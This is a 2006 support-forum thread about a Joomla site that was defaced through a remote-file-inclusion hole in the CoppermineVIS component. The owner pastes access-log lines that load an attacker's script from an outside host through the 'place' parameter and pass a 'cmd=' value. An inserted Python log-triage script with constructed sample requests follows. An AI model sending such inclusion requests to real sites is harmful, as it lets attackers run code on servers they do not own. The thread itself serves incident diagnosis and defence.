My Joomla Site Was Hacked via CoppermineVIS

My Joomla Site Was Hacked via CoppermineVIS

Postby Klementz on Thu Apr 13, 2006 10:29 pm

My site was hacked, so that visitors would see a plain white screen with this text:

A1TS /home/clements Ownz /home/clements :: by Shaka

It appears that only the index.php file was overwritten. I could still access the back end and all the content was still there. As well, a second installation of Joomla (1.0.7) in a sub domain remained untouched.

Details:

Joomla 1.0.8
PHP 4.4.1
MySQL 4.1.14-standard-log
Apache 1.3.34 (Unix)

Site is hosted by http://www.bluehost.com and is shared hosting.

I have access to the “Raw Access Logs” through cpanel, but have trouble sorting through the text. (Is there some sort of application that organizes that data?)

I have the following components installed on the site: AKObook 3.42 with the hack to add the security codes; Coppermine 1.4.3; CoppermineVIS Premium 1.30; joomlaXplorer 1.3.2; mosCE 1.0.3; PU Arcade.

Hmm… I *did* have JCE editor installed, but it seems to have vanished.

I have the following mambots installed: MGM Image Gallery; Imbed PHP (kl_php); the usual regular stuff.

My service provider told me this: My Fantastico control panel indicates I have Coppermine 1.3.4 and Joomla 1.0.3 installed. Those are the last versions I had installed via Fantastico before I started doing it myself. The tech support guy claimed that this is how the kiddie got in and told me to uninstall those old versions through Control Panel if I had manually installed newer versions myself. I am 99.999% sure that if I do that, I will be uninstalling my existing versions. He told me to do a full back up download, uninstall, then reinstall from the back up to clean it up, making the additional claim that I needed to do this because they probably got into my databases, too. Hmmm. Is this good advice?

Meanwhile, they did a restore and the site is back. I think if I just had a copy of the index.php file I could have uploaded it.

One more piece of information: I use .htaccess to protect the admin folder, so I have to log in twice when accessing the backend, once to get through .htaccess, and once to get into Joomla.

The big question is: Where is the weak point that allowed this to happen?


Edit: title of post
Last edited by Klementz on Fri Apr 14, 2006 4:11 am, edited 1 time in total.

Re: My Joomla 1.0.8 Site Was Hacked

Postby Hackwar on Thu Apr 13, 2006 11:48 pm

Have you read the sticky in this forum?
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.

Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.

Re: My Joomla 1.0.8 Site Was Hacked

Postby Klementz on Fri Apr 14, 2006 12:07 am

Hackwar wrote: Have you read the sticky in this forum?

Yes. And I carefully gathered all the information requested. Did I miss something? I thought I was at this stage:

Sticky Note wrote:
I have checked all this, what can I do now?
Ok, you have collected all the files, you are sure that it's Joomla and not your or your provider's configuration that has caused the hacker to gain access to your server and you also have eliminated all third party extensions as source of the vulnerability. Now wrap all that information up in a nice mail and send it to security [at] joomla [dot] org. With this mailing list you reach the developers and they will investigate this further.

Obviously I can't really tell if it was a Bluehost vulnerability and I am trying to find out if the problem lies in my installation.

Was I not supposed to ask for help here?

Re: My Joomla 1.0.8 Site Was Hacked

Postby Hackwar on Fri Apr 14, 2006 12:22 am

Sorry, no, it was okay. I'm just a bit sleepy... I can't really help you. Let's hope someone else can. I think someone will tomorrow... ;)

Re: My Joomla 1.0.8 Site Was Hacked

Postby virtualmaker on Fri Apr 14, 2006 2:09 am

Hi!

Remember, the configuration.php should not be writable after you make modifications, it's very important...

Re: My Joomla 1.0.8 Site Was Hacked

Postby stingrey on Fri Apr 14, 2006 2:51 am

There is possibly a security vulnerability within the CoppermineVIS component:
http://forum.joomla.org/index.php/topic,51714.0.html

This could have been the point of weakness, however you need to examine your access logs.
Joomla! Core Team Member
Software Coding and Design - Stability Team Leader

God grant me the Serenity to Accept the things I cannot change, the Courage to change the things I can and the Wisdom to know the Difference.

Re: My Joomla 1.0.8 Site Was Hacked via CoppermineVIS

Postby Klementz on Fri Apr 14, 2006 4:10 am

The (not so) funny thing is, I wasn't even using that component any more. But I guess it was there, published on my site.

I don't know enough about these access logs, but I think this stuff may be the culprit:

POST /index.php?option=com_copperminevis&Itemid=1&place=gallery&option=com_copperminevis&Itemid=1&place=http%3A%2F%2Fxpl.netmisphere2.com%2Ftool.txt%3F&&s=r& HTTP/1.1" 200 17497

GET /index.php?option=com_copperminevis&Itemid=1&place=http://xpl.netmisphere2.com/tool.txt?&&s=r&cmd= HTTP/1.1" 200 13383 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

etc. etc. etc.

CoppermineVIS is now uninstalled.

Thank you!!
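As an added example (not code from the thread or from any Joomla project), a small Python triage script for cPanel "Raw Access Logs" lines like the ones quoted above: it flags every request whose query-string parameter value is itself an absolute URL, the shape of the remote-file-inclusion requests seen against the `place` parameter. The sample log entries, the IP address and the `rfi-host.example` host are constructed, modelled on the quoted entries.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Matches the request line and status code of an Apache access log entry.
# The opening quote is optional so trimmed lines like the ones quoted above still match.
REQUEST_RE = re.compile(r'"?(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def find_remote_includes(log_lines):
    """Return one (method, status, param, remote_host) tuple per request whose
    query string carries a parameter whose value is an absolute URL.
    That is the classic remote-file-inclusion indicator."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes (%3A%2F%2F -> ://) and keeps repeated keys,
        # so a parameter supplied twice (once benign, once hostile) is still seen.
        for key, value in parse_qsl(query, keep_blank_values=True):
            parsed = urlsplit(value)
            if parsed.scheme in ("http", "https", "ftp") and parsed.netloc:
                hits.append((m.group("method"), int(m.group("status")), key, parsed.netloc))
    return hits

# Constructed sample entries in Apache combined format (placeholder IP and host);
# the query strings follow the shape of the entries quoted in the post above.
SAMPLE_LOG = [
    '203.0.113.9 - - [13/Apr/2006:21:40:02 -0400] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 8812 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [13/Apr/2006:21:40:31 -0400] "POST /index.php?option=com_copperminevis&Itemid=1&place=gallery&place=http%3A%2F%2Frfi-host.example%2Ftool.txt%3F&&s=r& HTTP/1.1" 200 17497 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [13/Apr/2006:21:40:55 -0400] "GET /index.php?option=com_copperminevis&Itemid=1&place=http://rfi-host.example/tool.txt?&&s=r&cmd= HTTP/1.1" 200 13383 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
]

if __name__ == "__main__":
    # A status of 200 on such a request means the server served the page, so
    # the include attempt reached the component and needs a closer look.
    for method, status, param, host in find_remote_includes(SAMPLE_LOG):
        print(f"{method} status={status} param={param!r} pulls code from {host}")
```

Feed the function the whole raw access log (one string per line) to get a short list of the requests worth reading first, instead of scrolling through the entire file.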

Re: My Joomla Site Was Hacked via CoppermineVIS

Postby Wil on Fri Apr 14, 2006 4:38 am

Did you patch copperminevis? It was vulnerable but is already fixed! Be aware and watch for problems with the software you're using.
Look on joombla.com, copperminevis is safe now if you download the recent version!

Re: My Joomla Site Was Hacked via CoppermineVIS

Postby Klementz on Fri Apr 14, 2006 1:31 pm

Wil wrote: Did you patch copperminevis?

No, I wasn't even using it. After I started using it, there was something about it that I didn't like (can't remember now). Therefore, it was just sitting there being ignored.

What I have learned is that a component doesn't actually need to be in use to be vulnerable. I am going to uninstall all the other stuff that is sitting on my site not being used.
